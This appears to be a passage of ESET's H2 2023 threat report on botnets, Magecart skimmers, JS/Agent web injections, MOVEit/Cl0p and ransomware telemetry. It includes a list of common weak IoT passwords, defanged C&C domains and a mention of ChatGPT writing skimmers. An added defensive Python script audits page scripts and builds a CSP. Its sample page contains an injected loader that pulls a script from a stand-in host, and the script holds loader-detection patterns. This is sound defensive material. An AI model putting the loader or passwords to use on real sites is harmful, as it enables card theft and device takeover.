While the Pandora botnet was on the rise, other Mirai-based botnets tracked by ESET – including Gafgyt, BotenaGo, Dofloo, Tsunami, Zero, and others – seemed to lose steam. According to our telemetry, these networks of enslaved IoT devices caused "only" 7.5 million attacks in H2 2023, a notable 59% decrease compared to H1 2023. The highest number of those attacks were directed at the US (22%), Germany (7%), and the United Kingdom (7%).

Somewhat counterintuitively, the number of servers delivering modified Mirai payloads for these botnets dropped by only 3% – just a few dozen machines – and the Mirai-based IoT armies have grown by 58% from 106,000 to over 168,000 between the first and second halves of 2023. The largest share of that increase came from Egypt, which hosted close to 110,000 (65%) of all the detected compromised devices – a 164% jump compared to 42,000 (39%) seen in the first half of 2023. Looking at the other side of that equation, the greatest percentage of unique devices facing Mirai-based bot attacks were in Germany (16%), the US (9%), and Mexico (7%).

Mirai-based botnets have refreshed the list of exploited flaws in H2 2023 by adding CVE-2023-26801: this recently reported command injection vulnerability in several LB-LINK routers was the second most abused in the last six months and accounted for 10% of all detected attack attempts.

Top 10 most common weak IoT device passwords in 2023
admin 75%
root 13%
1234 3%
password 2%
guest 1%
12345 1%
support 0.7%
x-admin 0.6%
Admin 0.6%
super 0.4%

Infostealers Web threats

Magecart, the ever-present phantom haunting e-commerce
It seems there is never a prolonged period without notable Magecart attacks and H2 2023 was no exception.

Magecart has been successfully targeting online shopping and hospitality platforms since 2015 and shows no signs of stopping. On the contrary, based on ESET data, H2 2023 marks the second year of continuous growth for this malware. But what makes Magecart such a pervasive threat?

In ESET telemetry, Magecart detections fall under JS/Spy.Banker, which is categorized as a web skimmer – i.e., a malicious online script injected into the code of hacked or unpatched websites with the goal of stealing information from those who browse these websites. Magecart mostly goes after credit card data and targets websites hosted on Magento and WordPress platforms. There is no single threat actor behind the Magecart attacks; ESET tracks under the one label the activity of the several groups that use Magecart.

This malware family consistently ranks in the top positions in our most-detected Infostealer statistics. In H2 2023, it was in second place, with detections counting in tens of thousands, the only threat with more detected activity being Agent Tesla. Still, it should be mentioned that since JS/Spy.Banker detections are based on the number of unique visits to a website, it will have a generally higher number of detections than threats distributed as email attachments or downloader payloads.

Nevertheless, there is little doubt that Magecart is a very prolific threat. Looking at our data, JS/Spy.Banker has been growing in numbers since the end of 2021 – the overall increase of its detections between 2021 and 2023 amounts to 343%. Zooming in on H2 2023, we can see that while the malware family did not grow dramatically this period (+9%), there was still an uptick

[Chart: JS/Spy.Banker detection trend in H1 and H2 2023, seven-day moving average (H2 vs. H1: +9%)]
in detections starting in October and accelerating throughout November. Since the end of the year is also the time when people generally do a lot more online shopping due to the approaching holiday season, it comes as no surprise that Magecart rates would increase as well.

While Magecart attacks are not the flashiest or most sophisticated forms of cybercrime out there, they have been successfully used by cybercriminals for years. Their simplicity works in their favor, using scripts that are relatively straightforward to code, while the myriads of unpatched websites make for easy prey. It also seems that the ongoing AI boom might be a boon to Magecart: researchers have shown that ChatGPT can be abused to write web-skimming scripts, which would make this type of malware accessible to a broader range of cybercriminal actors.

Apart from the obvious impact on the customers of a compromised website, whose money and personal information gets into the hands of cybercriminals, Magecart attacks can be quite devastating to the targeted companies. Due to the loss of confidence of their clients, these businesses face monetary consequences, since fewer customers means less revenue. There can also be legal ramifications: for example, in the EU, these companies can find themselves in violation of GDPR due to data leaks, which can lead to significant fines. In a recent report, IBM estimated that the average cost of a data breach in 2023 was USD 4.45 million.

[Figure: Website compromised by JS/Spy.Banker and the malicious code linked to the page]

Top 10 infostealer families in H2 2023 (% of Infostealer detections)
MSIL/Spy.AgentTesla trojan 14.7%
JS/Spy.Banker trojan 13.7%
PHP/Webshell backdoor 6.1%
Win/Formbook trojan 5.9%
MSIL/Spy.Agent trojan 3.0%
ASP/Webshell backdoor 2.4%
PHP/Agent backdoor 2.0%
Win/HoudRat trojan 1.8%
Win/Korplug backdoor 1.7%
Win/Spy.Agent trojan 1.7%

It is, however, very much possible to protect a business against Magecart skimmers. If you want to prevent your website from being compromised, we recommend that you make sure that your website servers and CMS are running up-to-date software, and that the accounts administering those resources are protected by strong authentication mechanisms (i.e., using strong passwords and two-factor authentication).

In H2 2023, there have also been some notable evolutions in the threat actors' approach towards compromising e-commerce websites. This is another reason why Magecart is, at least for now, here to stay – it does not remain stagnant.

Analysts at Akamai published two research pieces on these more sophisticated attacks. One of them describes how cybercriminals leverage legitimate websites to attack others. First, they inject Magecart code into a vulnerable site, using it to host the code, then they attack their actual target by employing malicious JavaScript code snippets as loaders that get the full code from the previously compromised vulnerable website.

We have also been encountering scripts that function similarly to the ones described in the linked article – if a skimmer is not located directly on the targeted website, ESET products usually detect the script leading to it. These scripts often belong to the JS/Redirector or JS/Agent families.

The other research piece talks about hiding Magecart scripts in 404 error pages: once a victim wants to pay for the goods they're buying, a malicious piece of code calls the 404 page with the skimmer script, which then overlays a lookalike payment form on the checkout page to capture the user data. At ESET, we detect the code snippet loader hidden within the 404 pages as JS/Spy.Banker.MC.

The abuse of HTML error pages is an established cybercriminal technique. For example, the now-defunct TeslaCrypt ransomware used to hide C&C commands in HTML tags. Luckily, Magecart scripts are usually easily recognized by cybersecurity products even though the threat actors try to hide them in creative ways: in case of an encounter with a compromised site, it would be detected and blocked by the ESET detection engine.

Magecart attacks are the most prevalent in the US, which registered almost 15% of JS/Spy.Banker attack attempts. This threat is actually the most detected infostealer in the United States, accounting for a third of all Infostealer detections in the country. This is also the case in Italy, the country with the second highest numbers of JS/Spy.Banker detections globally (11%). This threat represents 42% of Infostealer detections ESET telemetry registered there.

[Chart: Geographic distribution of JS/Spy.Banker detections in H2 2023]

OTHER INFOSTEALER INSIGHTS

macOS password stealers on the rise
The macOS platform is generally targeted by adware and Potentially Unwanted Applications (PUAs); however, ESET telemetry has detected a worrying trend in H2 2023, where Password Stealing Ware (PSW) on macOS experienced a staggering 290% increase. PSWs, which are just one subset of infostealers detected on the macOS platform by ESET, are a type of malware designed to steal sensitive data from users' systems. Working quietly in the background, PSWs can record keystrokes, capture screenshots, or directly steal saved passwords from the users' browsers or other applications.

Fueling this surge are numerous new PSWs discovered by security researchers in H2 2023, such as Metastealer, Pureland, Realst Infostealer, ShadowVault macOS Stealer, MacStealer, and AMOS. Posing as specific files or useful apps, these infostealers spread via malicious websites, malvertising, and phishing. In addition to stealing passwords and exfiltrating various file types, they can also extract credit card information and target cryptocurrency wallets. Despite the sharp rise in PSWs, even though the total numbers are rather low, it's worth noting that the overall category of Infostealers on macOS has increased only slightly in H2 2023, by 10%.

Qbot operations disrupted
In August 2023, the notorious Qbot malware (also known as Qakbot) was taken down thanks to a coordinated international operation conducted by several national law enforcement agencies, and organizations such as Europol and the FBI. In the process, the authorities seized nearly EUR 8 million in cryptocurrencies. The examination of Qbot infrastructure revealed over 700,000 compromised computers worldwide.

Looking at ESET telemetry data, the malware was already mostly inactive by that time. We have not seen much Qbot activity since the middle of the year – the last campaign we tracked occurred in the latter half of June. We have occasionally noticed some Qbot C&C server detections since the takedown took place, but some of the servers in question had already been neutralized by the authorities.

Web threats

Website visitors under siege by malicious scripts
The rise in JS/Agent detections reveals that almost 45,000 websites have fallen victim to malicious JavaScript code.

A threat contender has risen 111% to take second place among all threats recorded by ESET telemetry in H2 2023: JS/Agent. This detection name refers to malicious JavaScript code loaded by compromised web pages. From September 2023, we have observed a massive wave of JS/Agent detections – the likes of which have not been seen in the past three years.

As can be seen in the Magecart section, threat actors are known to attempt to exploit website vulnerabilities that may allow them to inject malicious JavaScript code into web pages. Such code is typically the beginning of a chain of scripts that allows attackers to download further malicious scripts, which can take over admin access to the site, install malicious web plugins, or deliver payloads such as backdoors.

Most of the increase in JS/Agent detections was due to the 136% growth of the JS/Agent.PHC variant and the appearance of the .RAN and .RAW variants. The .PHC variant includes the ndsj malware Sucuri reported on in June 2022. This malware consists of lightly obfuscated JavaScript that executes the next stage, usually a malicious PHP script already present on the compromised web server and whose job is to fetch a JavaScript payload from a C&C server.

The most prevalent detections of JS/Agent.PHC were in Japan (10%), Spain (8%), and the US (6%). From September to November, ESET telemetry recorded 14,500 websites compromised with the .PHC variant.

[Chart: JS/Agent detection trend from January 2021 to November 2023, seven-day moving average]

EXPERT COMMENT
Website admins should be wary of which plugins they install, especially for WordPress, as this dramatically increases the attack surface. Make sure to put in place a patching policy that requires admins to apply updates as soon as they are available. Teach your web developers about secure coding practices such as data sanitization, secure HTTP headers, and a Content Security Policy to prevent multiple types of script injection attacks.
Ján Adámek, ESET Senior Detection Engineer

The .RAN and .RAW variants include malicious JavaScript detected as part of a Balada Injector campaign reported by Sucuri in October 2023. Both these variants are distinct, lightly obfuscated scripts but with a similar purpose: downloading the next-stage JavaScript code from a C&C server. For example, some .RAN samples download a script from stay.decentralappps[.]com, and some .RAW samples reach out to cdn.statisticscripts[.]com.

The .RAN variant accounts for the spike on September 21, the largest one seen in the past three years. Successive waves of detections are mainly due to the .RAW variant.

The .RAN and .RAW variants and 37 other related JS/Agent variants add up to over 900,000 detections in the second half of 2023. This indicates that many websites have been compromised in this period, probably due to attackers exploiting website vulnerabilities such as CVE-2023-3169, which affects specific versions of the tagDiv Composer plugin for WordPress, as reported in our ESET Security Forum.

The most prevalent detections of these 39 variants were in Italy (10%), Czechia (7%), and Poland (7%). From September to November, ESET telemetry recorded 6,700 websites compromised with the .RAN variant, and 23,500 with the .RAW variant.

[Chart: JS/Agent.PHC detection trend in H2 2023]
[Chart: JS/Agent.RAN and JS/Agent.RAW detection trends from September 2023 to November 2023]
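The loader pattern described in the Magecart and JS/Agent sections (a small injected snippet that pulls the real skimmer or next stage from another host, sometimes via a 404 page) and the Content Security Policy recommended in the expert comment can both be checked for on the defender's side. The following is an added example, not ESET's code: it audits the scripts a checkout page loads against a first-party allowlist, flags inline snippets that behave like loaders, and emits the CSP header that would refuse anything outside the allowlist; the page HTML and every hostname in it are constructed.

```python
"""Audit the scripts a web page loads and derive a Content-Security-Policy.

Added example (not from the ESET report). The sample page and all hostnames
are constructed; nothing is fetched from the network.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptCollector(HTMLParser):
    """Collects external <script src> URLs and the bodies of inline scripts."""

    def __init__(self):
        super().__init__()
        self.external = []   # src attribute of each <script src=...>
        self.inline = []     # text of each <script>...</script> without src
        self._in_inline = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_inline, self._buf = True, []

    def handle_data(self, data):
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_inline:
            self._in_inline = False
            body = "".join(self._buf).strip()
            if body:
                self.inline.append(body)


# Traits of a second-stage loader: it creates a script element or fetches
# something, and it names a URL, often on another compromised site; the
# report also describes loaders that request the site's own 404 page.
LOADER_PATTERNS = [
    r"createElement\(\s*['\"]script['\"]\s*\)",
    r"\bfetch\s*\(|XMLHttpRequest",
    r"(?:https?:)?//[a-z0-9.-]+\.[a-z]{2,}",
    r"/404",
]


def audit_scripts(html, page_host, allowed_hosts):
    """Return external scripts served from hosts outside the allowlist and
    inline scripts matching at least two loader traits. Relative src values
    count as first party."""
    parser = ScriptCollector()
    parser.feed(html)
    unexpected = []
    for src in parser.external:
        host = urlparse(src).hostname  # None for a relative path
        if host not in (None, page_host) and host not in allowed_hosts:
            unexpected.append(src)
    suspicious = [
        body for body in parser.inline
        if sum(1 for pat in LOADER_PATTERNS if re.search(pat, body)) >= 2
    ]
    return {"unexpected_scripts": unexpected, "suspicious_inline": suspicious}


def build_csp(allowed_hosts):
    """script-src limited to the page's own origin plus allowlisted hosts.
    Without 'unsafe-inline', an injected inline loader is refused by the browser."""
    sources = " ".join(["'self'"] + sorted(f"https://{h}" for h in allowed_hosts))
    return (f"Content-Security-Policy: script-src {sources}; "
            "object-src 'none'; base-uri 'self'")


# Constructed checkout page: a first-party script, the payment provider, an
# unexpected third-party script, a harmless inline config, and an injected
# loader that fetches its next stage from another site's 404 page.
SAMPLE_PAGE = """<html><head>
<script src="/static/js/checkout.js"></script>
<script src="https://js.payments.example/v3/"></script>
<script src="https://cdn.stats-scripts.invalid/s.js"></script>
<script>window.shopConfig={currency:"EUR",help:"https://shop.example/help"};</script>
<script>
var s=document.createElement('script');
s.src='//compromised-blog.invalid/404';document.head.appendChild(s);
</script>
</head><body><form id="checkout"></form></body></html>"""

PAGE_HOST = "shop.example"                # constructed
ALLOWED_HOSTS = {"js.payments.example"}   # constructed payment provider

if __name__ == "__main__":
    result = audit_scripts(SAMPLE_PAGE, PAGE_HOST, ALLOWED_HOSTS)
    for src in result["unexpected_scripts"]:
        print("external script outside allowlist:", src)
    for body in result["suspicious_inline"]:
        print("inline loader candidate:", body.replace("\n", " ")[:80])
    print(build_csp(ALLOWED_HOSTS))
```

Because the policy omits 'unsafe-inline', the shop's own inline scripts are blocked too, so move them into first-party files or add nonces before enforcing it. Deploying the same value as Content-Security-Policy-Report-Only first shows what would break without blocking anything.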



Ransomware

Cl0p and its MOVEit hack: A mass-spreading yet targeted attack
How exploitation of a two-year-old zero-day vulnerability by one actor caused a global cybersecurity nightmare.

EXPERT COMMENT
Looking back at 2023, we can safely say that ransomware was more active than in 2022. Based on published information and the incidents we investigated, the ransom demands grew also, although it is difficult to assess whether this was due to the greed of the attackers; victims being less willing to pay, which in turn forced attackers to look for revenue in masses; or if the adjustment was influenced by high inflation.

The story that stood out most to us was surely the MOVEit hack. However, it wasn't just the size of the campaign that made it so prominent, but also the technical proficiency of the Cl0p gang that was behind the attack. These threat actors demonstrated they can find a new zero-day vulnerability, weaponize it, and wait for the opportune moment to deploy it.

In 2024, we expect most of the outlined trends to continue, with current major players focusing on expansion of their affiliate programs. By employing other cybercriminals within their schemes, notable families will limit the space for emergence of new competitors.
Jakub Souček, ESET Senior Malware Researcher

The biggest ransomware story of H2 2023 doesn't even include ransomware per se. What qualifies the so-called "MOVEit hack" for this chapter is that it was carried out by a cybercriminal group known as Cl0p (aka Lace Tempest, FIN11, TA505, or Evil Corp) infamous for using ransomware in large-scale hacks. However, its latest campaign reached such proportions that encrypting every victim was probably too laborious even for this group.

It all started on May 27, the first day of the US Memorial Day long weekend, when the cybercriminals launched a massive exploitation of a zero-day vulnerability (CVE-2023-34362) in the widely used managed transfer app MOVEit. The flaw, which the attackers probably sat on since 2021, allowed them to escalate their privileges and gain unauthorized access to stored and transferred data.

About a week later, the range of impact started to become apparent as information about high-profile victims – such as the BBC, British Airways, and Aer Lingus – started rolling in. It was about the same time that Microsoft first attributed the attack to the Cl0p gang, which in turn confirmed it via media and bragged that the number of compromised companies was in the hundreds.

Six months later, the number of affected organizations has surpassed 2,600 – at least according to Emsisoft's monitoring. The list of victims includes US governmental agencies, schools and universities, healthcare institutions, and also global corporations such as Sony, EY, and PricewaterhouseCoopers. If the 83 million records of individuals that were leaked are multiplied by IBM's average cost of USD 165 per breached record, that puts the estimated financial
damage of the hack close to USD 14 billion. That's more than the USD 10 billion damage caused by the infamous NotPetya incident.

Early estimates say Cl0p could pull in as much as USD 75–100 million from its victims. Due to the severity of the incident – and probably its heavy focus on the US and Canada – the US Department of State has issued a USD 10 million bounty for any information leading to the arrest and conviction of the perpetrators.

The MOVEit hack could also point to a new trend in the ransomware scene, as Cl0p started using the clear web to leak the stolen information. This move was first seen in June 2023 with the ALPHV ransomware gang (aka BlackCat) and makes this kind of cyberincident much more visible, increasing pressure on the victim. In an attempt to avoid takedowns, Cl0p also leaked part of the information via torrents due to the sheer volume of data stolen.

Two other new trends in H2 have been highlighted by the FBI. First was the deployment of two or more ransomware variants during the same incident, usually a choice of the AvosLocker, Diamond, Hive, Karakurt, LockBit, Quantum, and Royal families. Second was the use of wipers on top of data theft and ransomware encryption. This way attackers can corrupt data in compromised systems after a set time and thus further increase pressure on the victim.

CosmicBeetle replaces Scarab ransomware with its own ScRansom

In H2 2023, ESET researchers took a closer look at CosmicBeetle – a Turkish-speaking threat actor that uses the small Spacecolon (Sc) toolset to deploy ransomware all over the world.

ESET researchers also discovered a new ransomware strain in development, naming it ScRansom and attributing it with high confidence to the same threat actor. While at the time of our initial publication we had not observed any in-the-wild attacks using ScRansom, the situation changed shortly afterwards and this variant is now the preferred ransomware deployed by the CosmicBeetle group, replacing its former main payload choice, Scarab ransomware.

In some of its recent attacks, the threat actor modified the ransom note to impersonate LockBit and even set up a surface web leak site, mimicking LockBit's. There, they copied a few of the most recent LockBit victims and added some of their own. CosmicBeetle is likely abusing LockBit's well-known name in order to increase pressure on its own victims.

To gain an initial foothold, CosmicBeetle uses several attack avenues, including RDP brute forcing and exploitation of the ZeroLogon vulnerability (CVE-2020-1472). With low confidence, ESET researchers also assess that CosmicBeetle may be abusing a vulnerability in FortiOS, based on a "Forti" string found in the code and the fact that the vast majority of its victims have devices running FortiOS in their environment.

The Spacecolon toolset consists of three tools: the main orchestrator called ScHackTool, used to deploy a small component ScInstaller, which in turn installs CosmicBeetle's backdoor ScService. The latter allows the attacker to execute commands, retrieve information about victims' systems and download and execute payloads – for details refer to our original analysis.

NOTABLE NEW PLAYERS AND REBRANDS

3AM
A new Rust-based ransomware made headlines in September, attracting researchers' attention mostly by being deployed as a backup variant after a failed attempt to run LockBit ransomware. Since then, 3AM has been used to attack more than a dozen other victims, spilling their information via a newly set up Tor leak site.

LostTrust
LostTrust ransomware is a likely rebrand of the MetaEncryptor ransomware used by the same cybercriminal actors.

SophosEncrypt
It is not uncommon for cybercriminals to try to pin their activity on cybersecurity researchers and organizations. SophosEncrypt is an example of ransomware where threat actors are trying to "sell" their product as if it came from a known security company, Sophos.

NoEscape
A new ransomware family called NoEscape caught the attention of researchers and media in July 2023. Based on code similarity in its encryptor, experts suggest it could be a rebrand of a once prominent ransomware strain, known as Avaddon, whose operators closed shop in 2021. According to the list on NoEscape's darkweb leak site, the NoEscape group has already compromised at least a hundred companies in H2 2023.

Hunters International
Is Hive back? In H2 2023, the new ransomware as a service operation named Hunters International was launched. Upon analyzing its encryptor, several security researchers found major code overlap with Hive – a criminal service that was infiltrated and then dismantled by law enforcement early in H1 2023. The threat actors behind the new Hunters International deny any relationship to Hive and claim they've bought and fixed the old code from the previous operators. As for victims, Hunters' leak site lists dozens of compromised organizations, mostly from the United States and Europe.

ARRESTED/CLOSED SHOP/DECRYPTED:

HACKED: Trigona
The Trigona ransomware gang saw their servers infiltrated and wiped by Ukrainian cyberactivists. The Ukrainian Cyber Alliance (UCA) also claimed that they exfiltrated source code, internal communication, database records, and other data from Trigona's systems. This might include decryption keys; however, UCA didn't provide any further updates.

ARRESTED: Ragnar Locker
In late October, law enforcement agents took action against the Ragnar Locker ransomware family, interviewing five suspects and arresting one key individual. Physical raids were conducted in Czechia, Spain, and Latvia; seizure of infrastructure took place in the Netherlands, Germany, and Sweden. The dark web site was also taken down, and replaced with information about the operation. Ragnar Locker had been active since 2019, attacking critical infrastructure including the Portuguese national carrier and a hospital in Israel.

LEAKED CODE: HelloKitty
Source code for more ransomware has been leaked, this time it seems by the malicious actors behind the HelloKitty family themselves. The code for the first version of their malware appeared on a Russian-speaking forum accompanied by claims of work on a new, more powerful encryptor. This leaked code can – and probably will – lead to a series of newcomers who will try to utilize the information.

ARRESTED: LockBit (affiliate)
While the arrest of a LockBit affiliate took place early in 2023, US authorities only unveiled the charges and expected penalty in June 2023. The US Department of Justice is asking the courts to send the Russian Ruslan Magomedovich Astamirov to jail for up to 25 years.

DECRYPTOR: Key Group
Based on flaws in its encryption scheme, researchers created a decryptor for the Key Group ransomware. The free tool helps victims hit by the early versions of the ransomware. Key Group has been active since 2023, and is labeled as a Russian-speaking actor.

DECRYPTOR: Akira
A decryption tool is also available for the Akira ransomware, which has been active since 2023 attacking various sectors across the globe.

BOUNTY: Cl0p
Due to the severity of the MOVEit hack, the US Department of State has issued a USD 10 million bounty for any information leading to the arrest and conviction of the perpetrators known as the Cl0p gang.

ARRESTED: MegaCortex, HIVE, LockerGoga, Dharma
Europol, Eurojust, and agencies from seven countries have dismantled an organized group of ransomware actors whose attacks affected more than 1,800 victims in 71 countries. All five suspects were taken into custody in Ukraine, including a 32-year-old ringleader. A total of 30 locations were searched. This action followed a first round of arrests from 2021.
Threat telemetry

All threats

[Chart: Overall threat detection trend in H1 2023 and H2 2023, seven-day moving average (H2 vs. H1: -2%)]
[Chart: Geographic distribution of malware detections in H2 2023]

Top 10 malware detections in H2 2023 (% of malware detections)
HTML/Phishing.Agent trojan 23.4%
JS/Agent trojan 10.1%
DOC/Fraud trojan 9.4%
Win/Exploit.CVE-2017-11882 trojan 8.3%
HTML/Phishing trojan 5.2%
PDF/Phishing trojan 2.9%
MSIL/TrojanDownloader.Agent trojan 2.9%
LNK/Agent trojan 2.5%
HTML/Fraud trojan 1.9%
JS/ScrInject trojan 1.5%

Android

[Chart: Detection trends of selected Android detection categories in H1 2023 and H2 2023, seven-day moving average (H2 vs. H1: +22%); trends of Clickers, Cryptominers, Ransomware, Scam apps, SMS trojans, and Stalkerware are combined in the trendline Other]
[Chart: Geographic distribution of Android detections in H2 2023]

Top 10 Android detections in H2 2023 (% of malware detections)
Android/TrojanDropper.Agent trojan 27.1%
Android/Agent trojan 8.3%
Android/AdDisplay.HiddAd PUA 7.3%
Android/Hiddad trojan 6.4%
Android/AdDisplay.MobiDash PUA 5.1%
Android/Spy.Agent trojan 4.5%
Android/Spy.SpinOk trojan 4.3%
Android/Andreed trojan 3.9%
Android/SpyLoan PUA 3.5%
Android/AdDisplay.Fyben PUA 3.4%

Cryptocurrency threats

[Chart: Cryptocurrency threat detection trend in H1 2023 and H2 2023, seven-day moving average (H2 vs. H1: -19%)]
[Chart: Geographic distribution of Cryptocurrency threat detections in H2 2023]

Top 10 Cryptocurrency threat detections in H2 2023 (% of malware detections)
Win/CoinMiner PUA 35.6%
Win/CoinMiner trojan 15.9%
JS/CoinMiner PUA 12.7%
NSIS/CoinMiner trojan 6.6%
BAT/CoinMiner trojan 6.2%
MSIL/CoinMiner PUA 4.9%
Win/Spy.Agent trojan 4.3%
WASM/CoinMiner PUA 3.7%
MSIL/CoinMiner trojan 2.7%
JS/CoinMiner trojan 2.0%

Downloaders

[Chart: Downloader detection trend in H1 2023 and H2 2023, seven-day moving average (H2 vs. H1: +10%)]
[Chart: Downloader detections per detection type in H2 2023; detection types shown: MSIL, Win, JS, VBA, DOC, PowerShell, Other]

Top 10 Downloader detections in H2 2023 (% of malware detections)
MSIL/TrojanDownloader.Agent trojan 26.3%
Win/TrojanDownloader.ModiLoader trojan 13.3%
VBA/TrojanDownloader.Agent trojan 9.3%
JS/Danger trojan 8.7%
DOC/TrojanDownloader.Agent trojan 8.7%
PowerShell/TrojanDownloader.Agent trojan 7.0%
VBS/TrojanDownloader.Agent trojan 4.0%
MSIL/TrojanDownloader.Agent_AGen trojan 2.9%
JS/TrojanDownloader.Nemucod trojan 2.2%
JS/TrojanDownloader.Agent trojan 1.9%

[Chart: Geographic distribution of Downloader detections in H2 2023]

Email threats

[Figure: Malicious email detection trend in H1 2023 and H2 2023, seven-day moving average; annotated H1-to-H2 change: -8%]

Top 10 threats detected in emails in H2 2023
HTML/Phishing.Agent trojan 34.3%
DOC/Fraud trojan 15.5%
Win/Exploit.CVE-2017-11882 trojan 13.1%
HTML/Phishing trojan 7.0%
MSIL/TrojanDownloader.Agent trojan 4.2%
PDF/Phishing trojan 2.5%
HTML/Fraud trojan 2.4%
Win/TrojanDownloader.ModiLoader trojan 2.4%
JS/Danger.ScriptAttachment trojan 1.5%
DOC/TrojanDownloader.Agent trojan 1.4%

[Figure: Spam detection trend in H1 2023 and H2 2023, seven-day moving average; annotated H1-to-H2 change: +6%]

[Figure: Top malicious email attachment types in H2 2023 (pie chart). Labels as extracted: Scripts, Executables, Office documents, PDF, Archives, Batch, Shortcuts, Jar, Android. Slice values as extracted, label pairing not recoverable from the text layer: 53.9%, 20.1%, 11.1%, 10.0%, 3.0%, 1.2%, 0.6%, 0.1%, 0.01%]

Email threats

[Figure: Geographic distribution of Email threat detections in H2 2023; map legend scale 0% to 15%]

Exploits

[Figure: Trends of RDP, SMB and SQL attack attempts in H1 2023 and H2 2023, seven-day moving average; chart annotations as extracted: +5%, -2%, -1%]

[Figure: External network intrusion vectors reported by unique clients in H2 2023 (pie chart). Labels as extracted: Password guessing; Apache Struts2 CVE-2017-5638; Apache spring4j CVE-2022-22963,22965; Apache log4j CVE-2021-44228; SMB.DoublePulsar scan; MS IIS CVE-2015-1635; Pulse Secure CVE-2019-11510; MS SMB1 EternalBlue; MS RDP CVE-2019-0708 Bluekeep; Other. Slice values as extracted, label pairing not recoverable from the text layer: 42.6%, 19.5%, 14.0%, 8.0%, 5.5%, 3.9%, 2.8%, 2.4%, 0.8%, 0.4%]



Exploits

[Figure: Geographic distribution of RDP password guessing attack attempt sources in H2 2023; map legend scale 0% to 16%]

[Figure: Geographic distribution of SMB password guessing attack attempt targets in H2 2023; map legend scale 0% to 43%]

[Figure: Geographic distribution of RDP password guessing attack attempt targets in H2 2023; map legend scale 0% to 13%]

[Figure: Geographic distribution of SQL password guessing attack attempt targets in H2 2023; map legend scale 0% to 10%]

Exploits

[Figure: Detection trend of Log4Shell exploitation attempts in H1 2023 and H2 2023, seven-day moving average; annotated H1-to-H2 change: +9%]

[Figure: Geographic distribution of Log4Shell exploitation attempts in H2 2023; map legend scale 0% to 43%]

Infostealers

[Figure: Infostealer detection trend in H1 2023 and H2 2023, seven-day moving average; annotated H1-to-H2 change: -9%]

Top 10 Infostealer families in H2 2023 (% of Infostealer detections)
MSIL/Spy.AgentTesla trojan 14.7%
JS/Spy.Banker trojan 13.7%
PHP/Webshell backdoor 6.1%
Win/Formbook trojan 5.9%
MSIL/Spy.Agent trojan 3.0%
ASP/Webshell backdoor 2.4%
PHP/Agent backdoor 2.0%
Win/HoudRat trojan 1.8%
Win/Korplug backdoor 1.7%
Win/Spy.Agent trojan 1.7%

Infostealers

[Figure: Geographic distribution of Infostealer detections in H1 2023; map legend scale 0% to 8%]

macOS

[Figure: macOS detection trend in H1 2023 and H2 2023, seven-day moving average; annotated H1-to-H2 change: +2%]

Top 10 macOS detections in H2 2023 (% of macOS detections)
OSX/Mackeeper PUA 36.4%
OSX/Pirrit adware 9.1%
OSX/Bundlore adware 4.8%
OSX/TrojanDownloader.Adload trojan 4.6%
OSX/Keygen PUsA 4.5%
OSX/Genieo adware 4.4%
OSX/GT32SupportGeeks PUA 4.2%
OSX/BuhoCleaner PUA 3.5%
OSX/TrojanProxy.Agent trojan 2.7%
OSX/MaxOfferDeal adware 2.1%



macOS

[Figure: Geographic distribution of macOS detections in H2 2023; map legend scale 0% to 19%]

Ransomware

[Figure: Ransomware detection trend in H1 2023 and H2 2023, seven-day moving average; annotated H1-to-H2 change: -15%]

Top 10 Ransomware detections in H2 2023 (% of Ransomware detections)
Win/Filecoder.STOP trojan 12.2%
MSIL/Filecoder trojan 8.4%
Win/Filecoder.WannaCryptor trojan 8.0%
Win/Filecoder trojan 7.9%
Win/Filecoder.BlackMatter trojan 5.2%
Win/Filecoder.Phobos trojan 3.6%
PowerShell/Filecoder trojan 2.8%
Win/Filecoder.GandCrab trojan 2.7%
Python/Filecoder trojan 2.7%
Win/LockScreen trojan 2.6%



Ransomware

[Figure: Geographic distribution of Ransomware detections in H2 2023; map legend scale 0% to 10%]

Web threats

[Figure: Web threat block trend in H1 2023 and H2 2023, seven-day moving average; annotated H1-to-H2 change: +2%]

[Figure: Unique URL block trend in H1 2023 and H2 2023, seven-day moving average; annotated H1-to-H2 change: +28%]

Web threats

[Figure: Global distribution of Web threat blocks in H2 2023; map legend scale 0% to 14%]

[Figure: Global distribution of blocked domain hosting in H2 2023; map legend scale 0% to 33%]



Research publications

Asylum Ambuscade: Crimeware or cyberespionage?
A curious case of a threat actor at the border between crimeware and cyberespionage

Android GravityRAT goes after WhatsApp backups
ESET researchers analyzed an updated version of Android GravityRAT spyware that steals WhatsApp backup files and can receive commands to delete files

What’s up with Emotet?
A brief summary of what happened with Emotet since its comeback in November 2021

ESET Research Podcast: Finding the mythical BlackLotus bootkit
Here’s a story of how an analysis of a supposed game cheat turned into the discovery of a powerful UEFI threat

MoustachedBouncer: Espionage against foreign diplomats in Belarus
Long-term espionage against diplomats, leveraging email-based C&C protocols, C++ modular backdoors, and adversary-in-the-middle (AitM) attacks… Sounds like the infamous Turla? Think again!

ESET Research Podcast: Unmasking MoustachedBouncer
Listen as ESET's Director of Threat Research Jean-Ian Boutin unravels the tactics, techniques and procedures of MoustachedBouncer, an APT group taking aim at foreign embassies in Belarus

Mass-spreading campaign targeting Zimbra users
ESET researchers have observed a new phishing campaign targeting users of the Zimbra Collaboration email server.

Scarabs colon-izing vulnerable servers
Analysis of Spacecolon, a toolset used to deploy Scarab ransomware on vulnerable servers, and its operators, CosmicBeetle

Telekopye: Hunting Mammoths using Telegram bot
Analysis of Telegram bot that helps cybercriminals scam people on online marketplaces

BadBazaar espionage tool targets Android users via trojanized Signal and Telegram apps
ESET researchers have discovered active campaigns linked to the China-aligned APT group known as GREF, distributing espionage code that has previously targeted Uyghurs

Sponsor with batch-filed whiskers: Ballistic Bobcat’s scan and strike backdoor
ESET Research uncovers the Sponsoring Access campaign, which utilizes an undocumented Ballistic Bobcat backdoor we have named Sponsor

ESET Research Podcast: Sextortion, digital usury and SQL brute-force
Closing intrusion vectors force cybercriminals to revisit old attack avenues, but also to look for new ways to attack their victims

OilRig’s Outer Space and Juicy Mix: Same ol’ rig, new drill pipes
ESET researchers document OilRig’s Outer Space and Juicy Mix campaigns, targeting Israeli organizations in 2021 and 2022

Stealth Falcon preying over Middle Eastern skies with Deadglyph
ESET researchers have discovered Deadglyph, a sophisticated backdoor used by the infamous Stealth Falcon group for espionage in the Middle East

